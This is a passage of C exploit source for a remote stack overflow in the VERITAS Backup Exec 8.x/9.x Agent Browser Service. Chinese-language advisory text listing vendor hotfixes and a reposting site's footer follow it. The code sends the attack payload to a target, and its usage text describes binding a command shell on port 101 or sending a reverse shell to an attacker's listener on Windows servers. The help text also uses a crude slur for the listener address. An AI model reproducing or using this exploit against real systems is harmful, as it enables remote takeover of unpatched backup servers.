Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[ ] sending error 4,
the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[ ] sending error 5,
the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[ ] sending error 6,
the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[ ] sending error 7,
the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(10);
#else
Sleep(1/100);
#endif
if (send(s,payload,strlen(payload),0)==-1) { printf("[ ] sending error 8,
the server is patched.\n");return -1;}
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
printf("[ ] size of payload: %d\n",(sizeof(talk)-1) strlen(payload)*7);
printf("[ ] payload sent.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf("USAGE:\n");
printf(" [ ] . 101_BXEC.exe Version VulnIP\n");
printf(" [ ] . 101_BXEC.exe Version VulnIP VulnPORT\n");
printf(" [ ] . 101_BXEC.exe Version VulnIP VulnPORT GayIP
GayPORT\n");
printf("VERSION: \n");
printf(" [ ] 1. Backup Exec v9.1.4691.SP1\n");
printf(" [ ] 1. Backup Exec v9.1.4691.SP0\n");
printf(" [ ] 2. Backup Exec v8.5.3572\n");
printf("TARGET: \n");
printf(" [ ] . 2k3/2k/XP/NT4 universal (*)\n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or\n");
printf(" reverse a cmdshell on your listener.\n");
printf(" A wildcard (*) mean tested working.\n");
printf(" Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf("
\n");
printf("
================================================[0.4]========\n");
printf(" =================VERITAS Backup Exec
8.x/9.x=================\n");
printf(" =========Agent Browser Service, Remote Stack
Overflow========\n");
printf(" ======coded by class101=============[Hat-Squad.com
2005]=====\n");
printf("
=============================================================\n");
printf("
\n");
}
建议:
厂商补丁:
Veritas
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
For Backup Exec 8.6 Build 3878:
BENT86HF68_273422.exe 8.60.3878 Hotfix 68
http://support.veritas.com/docs/273422
For Backup Exec 9.1 Build 4691 Service Pack 1:
Be4691RHF40_273420.exe 9.1.4691 Hotfix 40
http://support.veritas.com/docs/273420
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
